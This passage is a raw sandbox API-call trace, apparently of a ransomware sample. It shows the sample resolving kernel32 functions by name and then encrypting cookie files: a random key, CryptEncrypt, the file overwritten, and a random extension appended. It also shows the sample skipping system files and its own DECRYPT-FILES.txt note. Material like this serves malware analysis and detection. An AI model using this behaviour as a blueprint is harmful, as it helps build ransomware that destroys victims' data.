returned="CreateSymbolicLinkA" [0079.404] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.404] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.404] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.404] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.405] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.405] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.405] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.405] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.405] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.405] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.405] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.405] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.405] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.405] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.405] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.405] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.405] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.405] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.405] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.405] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.405] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.405] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.406] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.406] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.406] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.406] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.406] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.406] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.406] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.406] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.406] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.406] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.406] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.406] lstrlenA (lpString="DELETEATOM") returned 10 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.406] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.406] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.406] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.406] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.406] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.406] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.406] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.406] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.407] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.407] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.407] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.407] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.407] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.407] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.407] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.407] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.407] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.407] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.407] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.407] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.407] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.407] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.407] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.407] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.407] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.407] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.407] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.408] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.408] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.408] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.408] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.408] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.408] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.408] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.408] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.408] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.408] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.408] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.408] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.408] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.408] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.408] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.408] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.408] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.409] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt") returned 110 [0079.409] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt.jKIw") returned 115 [0079.409] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt.jKIw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt.jkiw"), dwFlags=0x0) returned 1 [0079.409] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.410] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.410] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.410] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x610b9d00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61282d80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x61282d80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[3].txt", cAlternateFileName="5P692F~1.TXT")) returned 1 [0079.410] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.410] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="autorun.inf") returned -1 [0079.410] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="boot.ini") returned -1 [0079.410] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="desktop.ini") returned -1 [0079.410] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="ntuser.dat") returned -1 [0079.410] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="iconcache.db") returned -1 [0079.410] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="bootsect.bak") returned -1 [0079.410] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="ntuser.dat.log") returned -1 [0079.410] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="thumbs.db") returned -1 [0079.410] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[3].txt", lpString2="Bootfont.bin") returned -1 [0079.410] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[3].txt") returned 34 [0079.410] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.410] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.410] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.411] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.411] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.411] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[3].txt") returned 34 [0079.411] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.411] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@google[3].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" [0079.411] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.411] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.412] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=196) returned 1 [0079.412] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.412] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.412] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.412] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.412] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.414] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.414] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.414] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.415] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.415] CloseHandle (hObject=0x464) returned 1 [0079.415] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.415] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.416] CloseHandle (hObject=0x0) returned 0 [0079.416] CloseHandle (hObject=0x460) returned 1 [0079.417] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.417] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.417] GetTickCount () returned 0x114c591 [0079.417] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.418] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.418] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.418] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.418] lstrlenA (lpString="kernel32.dll") returned 12 [0079.418] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.418] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.418] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.418] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.419] lstrlenA (lpString="ADDATOMA") returned 8 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.419] lstrlenA (lpString="ADDATOMW") returned 8 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.419] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.419] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.419] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.419] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.419] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.419] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.419] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") 